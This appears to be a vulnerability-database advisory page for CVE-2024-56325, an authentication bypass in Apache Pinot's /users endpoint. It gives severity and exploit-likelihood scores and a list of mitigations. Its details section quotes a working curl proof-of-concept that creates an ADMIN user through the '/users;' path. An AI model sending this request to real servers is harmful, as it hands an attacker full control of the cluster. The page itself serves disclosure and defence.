CVE-2024-56325
Published: 01 April 2025
Summary
CVE-2024-56325 is a critical-severity Authentication Bypass Using an Alternate Path or Channel (CWE-288) vulnerability in Apache Pinot. Its CVSS base score is 9.8 (Critical).
Operationally, ranked in the top 4.8% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.
Deeper analysis
CVE-2024-56325 is an authentication bypass vulnerability affecting Apache Pinot. The flaw occurs in request path handling for the /users endpoint, where authentication is skipped if the path lacks a forward slash or contains a dot character. This allows unauthenticated creation of new users with arbitrary roles such as ADMIN on the CONTROLLER component.
An unauthenticated remote attacker can exploit the issue by submitting a POST request to a crafted endpoint such as /users; or /users;. , supplying JSON that defines a new administrative user. Successful exploitation grants full control over the Pinot cluster, including the ability to manage tables, permissions, and other components, consistent with the CVSS 9.8 rating and CWE-288 classification.
The associated EPSS score rose from a low baseline to a peak of 0.3077 on 2026-02-04 before receding to the current value of 0.1741, indicating increased exploitation interest after disclosure. Official advisories and patches are discussed in the Apache announcement at lists.apache.org/thread/ksf8qsndr1h66otkbjz2wrzsbw992r8v and the oss-security posting from March 2025.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2025-9317
Vulnerability details
Authentication Bypass Issue If the path does not contain / and contain., authentication is not required. Expected Normal Request and Response Example curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"} http://{server_ip}:9000/users Return: {"code":401,"error":"HTTP 401 Unauthorized"} Malicious Request and Response Example…
more
curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}' http://{serverip}:9000/users; http://{serverip}:9000/users; . Return: {"users":{}} A new user gets added bypassing authentication, enabling the user to control Pinot.
- CWE(s)
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
Authorizing remote access reduces the ability to bypass authentication via unauthorized alternate remote channels.
Users can identify logons via alternate paths or channels by reviewing the previous logon time.
Adaptive requirements can apply across access paths, reducing the ability to bypass authentication via alternate channels or paths.
Centralized IdPs close alternate authentication paths that enable bypass.
Enforces authentication for non-organizational users, making it harder to bypass via alternate paths or channels.
Requires authentication to occur exclusively over the isolated trusted path, directly preventing bypass via alternate or untrusted channels.